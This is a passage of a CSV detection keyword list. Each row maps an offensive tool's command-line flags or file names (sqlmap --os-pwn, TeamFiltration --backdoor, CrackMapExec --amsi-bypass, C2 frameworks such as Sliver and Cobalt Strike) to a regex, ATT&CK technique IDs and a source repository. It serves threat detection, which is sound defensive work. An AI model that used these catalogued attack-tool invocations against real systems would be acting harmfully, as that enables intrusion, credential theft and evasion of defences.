?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --nt-offsets *.csv*",".{0,1000}\s\-\-nt\-offsets\s.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "* ntp-info.nse*",".{0,1000}\sntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ntp-monlist.nse*",".{0,1000}\sntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nuages.formatImplantLastSeen*",".{0,1000}\snuages\.formatImplantLastSeen.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "* NuagesImplant*",".{0,1000}\sNuagesImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "* nullinux.py*",".{0,1000}\snullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "* -o /share/payloads/*",".{0,1000}\s\-o\s\/share\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* -o cowroot*",".{0,1000}\s\-o\scowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","29","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" "* -o ffuf.csv*",".{0,1000}\s\-o\sffuf\.csv.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "* -o merlin.dll merlin.c *",".{0,1000}\s\-o\smerlin\.dll\smerlin\.c\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "* -o moonwalk*",".{0,1000}\s\-o\smoonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "* -o simpleXORencoder*",".{0,1000}\s\-o\ssimpleXORencoder.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* -o sliver-server*",".{0,1000}\s\-o\ssliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* -o sprayed.txt*",".{0,1000}\s\-o\ssprayed\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* -o:badrat.xll *",".{0,1000}\s\-o\:badrat\.xll\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* -oA icebreaker-scan*",".{0,1000}\s\-oA\sicebreaker\-scan.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* --obfuscate *",".{0,1000}\s\-\-obfuscate\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* Obfuscated-Code.py*",".{0,1000}\sObfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "* obfuscation.exe --help*",".{0,1000}\sobfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* octopus.py*",".{0,1000}\soctopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "* office2john.py*",".{0,1000}\soffice2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* OfficePersistence.ps1*",".{0,1000}\sOfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "* oh365userfinder.py*",".{0,1000}\soh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* -old-bloodhound*",".{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* omp2-brute.nse*",".{0,1000}\somp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* omp2-enum-targets.nse*",".{0,1000}\somp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* omron-info.nse*",".{0,1000}\somron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --oneliner-nothidden*",".{0,1000}\s\-\-oneliner\-nothidden.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* onesixtyone.c*",".{0,1000}\sonesixtyone\.c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "* --only-abuse --dc-host *",".{0,1000}\s\-\-only\-abuse\s\-\-dc\-host\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --only-known-exploit-paths*",".{0,1000}\s\-\-only\-known\-exploit\-paths.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* openflow-info.nse*",".{0,1000}\sopenflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openlookup-info.nse*",".{0,1000}\sopenlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openvas-otp-brute.nse*",".{0,1000}\sopenvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* openwebnet-discovery.nse*",".{0,1000}\sopenwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* options.fake_hostname*",".{0,1000}\soptions\.fake_hostname.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* oracle-brute.nse*",".{0,1000}\soracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-brute-stealth.nse*",".{0,1000}\soracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-enum-users.nse*",".{0,1000}\soracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-sid-brute.nse*",".{0,1000}\soracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-tns-version.nse*",".{0,1000}\soracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --os-bof*",".{0,1000}\s\-\-os\-bof.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --os-cmd whoami*",".{0,1000}\s\-\-os\-cmd\swhoami.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --os-pwn*",".{0,1000}\s\-\-os\-pwn.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --os-smbrelay*",".{0,1000}\s\-\-os\-smbrelay.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* ouned_smbserver.py*",".{0,1000}\souned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* --outdir ldapdomaindump *",".{0,1000}\s\-\-outdir\sldapdomaindump\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Out-Minidump.ps1*",".{0,1000}\sOut\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --outpath * --config *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --outpath *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --output rootDSEs.json --dump*",".{0,1000}\s\-\-output\srootDSEs\.json\s\-\-dump.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "* ovs-agent-version.nse*",".{0,1000}\sovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* owa * --user-as-pass *",".{0,1000}\sowa\s.{0,1000}\s\-\-user\-as\-pass\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* oxidfind -i *",".{0,1000}\soxidfind\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* oxidfind -n *",".{0,1000}\soxidfind\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* -p * --amsi-bypass *",".{0,1000}\s\-p\s.{0,1000}\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -p * -d *.dll -e OpenProcess*",".{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\.dll\s\-e\sOpenProcess.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "* -p *\mimi.out*",".{0,1000}\s\-p\s.{0,1000}\\mimi\.out.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 